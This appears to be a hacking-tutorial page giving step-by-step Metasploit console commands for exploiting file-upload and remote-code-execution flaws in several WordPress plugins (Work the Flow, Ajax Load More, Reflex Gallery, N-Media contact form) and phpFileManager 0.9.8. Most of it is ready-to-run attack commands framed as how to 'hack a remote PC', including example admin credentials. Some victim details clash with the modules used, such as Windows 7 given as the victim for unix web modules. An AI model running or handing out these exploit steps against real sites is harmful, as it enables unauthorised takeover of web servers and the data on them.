Hack Remote PC using Wordpress Work the Flow Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Work the Flow plugin, version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution

Exploit Targets

Work the Flow plugin, version 2.5.2.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_worktheflow_upload

msf exploit (wp_worktheflow_upload)>set targeturi wordpress

msf exploit (wp_worktheflow_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_worktheflow_upload)>set rport 80

msf exploit (wp_worktheflow_upload)>exploit     

Hack Remote PC using Wordpress Ajax Load More PHP Upload Vulnerability

This module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows uploading arbitrary php files and getting remote code execution. This module has been tested successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.

Exploit Targets

WordPress Ajax Load More 2.8.0

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_ajax­­­­­_load_more_file_upload

msf exploit (wp_ajax­­­­­_load_more_file_upload)>set targeturi wordpress

msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_username admin

msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_password admin123

msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rport 80

msf exploit (wp_ajax­­­­­_load_more_file_upload)>exploit     

Hack Remote PC using WordPress Reflex Gallery Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution

Exploit Targets

Reflex Gallery version 3.1.3

Requirement

Attacker: kali Linux

Victim PC: Wordpress Installed

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit (wp_reflexgallery_file_upload)>set targeturi wordpress

msf exploit (wp_reflexgallery_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_reflexgallery_file_upload)>set rport 80

msf exploit (wp_reflexgallery_file_upload)>exploit    

Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets

WordPress N-Media Website Contact Form plugin

Requirement

Attacker: kali Linux

Victim PC: Wordpress Installed

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress

msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_nmediawebsite_file_upload)>set rport 80

msf exploit (wp_nmediawebsite_file_upload)>exploit   

Hack Remote Linux PC using PHPFilemanager 0.9.8 Remote Code Execurion

This module exploits remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file.

Exploit Targets

phpFileManager 0.9.8

Requirement

Attacker: kali Linux

Victim PC: Linux

Open Kali terminal type msfconsole

Now type use exploit/multi/http/phpfilemanager_rce

msf exploit (phpfilemanager_rce)>set targeturi /phpfilemanager-0.9.8/index.php

msf exploit (phpfilemanager_rce)>set rhost 192.168.0.119 (IP of Remote Host)

msf exploit (phpfilemanager_rce)>exploit